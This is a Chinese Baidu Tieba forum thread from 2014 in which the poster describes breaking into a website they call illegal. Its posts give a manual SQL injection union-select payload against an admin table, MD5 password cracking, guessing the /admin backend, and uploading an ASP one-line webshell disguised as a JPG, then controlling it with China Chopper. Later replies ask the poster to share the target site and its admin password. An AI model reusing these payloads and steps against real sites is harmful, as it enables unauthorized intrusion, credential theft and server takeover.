渗透一次非法网的超详细过程【图文详解】_白帽渗透吧

02月14日漏签0天

白帽渗透吧关注：78贴子：155

1 2 下一页尾页
17回复贴，共2页
，跳到页

<返回白帽渗透吧

渗透一次非法网的超详细过程【图文详解】

只看楼主收藏回复

简单粗暴

送TA礼物

IP属地:福建

1楼2014-04-05 09:51回复

那我用手工来注入出来。在该页面输入语句：
%20Un ion%20s elect%201,2,3,4,5,6,7,8,9,10,11,12,13%20from%20admin

IP属地:福建

5楼2014-04-05 09:55

得到管理员账号密码的字段位置。

IP属地:福建

6楼2014-04-05 09:56

因为前面使用啊D已经知道了字段的名称。直接带入进去。将2的地方带入为admin，8的地方带入为password。得到管理员账号密码：

IP属地:福建

7楼2014-04-05 09:57

是一个32位的MD5值拿去解密，成功解密得到密码

IP属地:福建

8楼2014-04-05 09:58

还没找后台，于是在网站后面试试加个/admin，果真是后台，直接进去了

IP属地:福建

9楼2014-04-05 10:02

保存后打开了，漏洞上没说明传说明文件，传asp的没有得到源地址。于是我将asp马改成jpg的，成功在源代码中得到地址。

IP属地:福建

11楼2014-04-05 10:05

上小马~结果提示解析错误，貌似是小马代码不行~干脆直接上一句话木马。将
<%eval request(“unis”)%>
写入图片。通过exp直接上传。

IP属地:福建

12楼2014-04-05 10:06

成功传上去，查看源代码得到一句话木马地址，用中国菜刀连~成功连上去了

IP属地:福建

13楼2014-04-05 10:08

然后教程结束该上大马上大马

IP属地:福建

14楼2014-04-05 10:18

收起回复

楼主，网站拿出来，我去看看

IP属地:重庆

16楼2014-08-16 09:47

还有后台密码交出来

IP属地:重庆

17楼2014-08-16 09:54

楼主真是大神啊小白谦虚的路过～～～～～～～～

来自Android客户端20楼2015-01-19 23:38

楼主用的什么工具

来自iPhone客户端21楼2015-01-23 11:25

扫二维码下载贴吧客户端

下载贴吧APP
看高清直播、视频！

贴吧热议榜

1 2 下一页尾页
17回复贴，共2页
，跳到页

<返回白帽渗透吧

发表回复

发贴请遵守贴吧协议及“七条底线”贴吧投诉

内容:

使用签名档查看全部

发表

保存至快速回贴

日	一	二	三	四	五	六

渗透一次非法网的超详细过程【图文详解】

登录百度账号

扫二维码下载贴吧客户端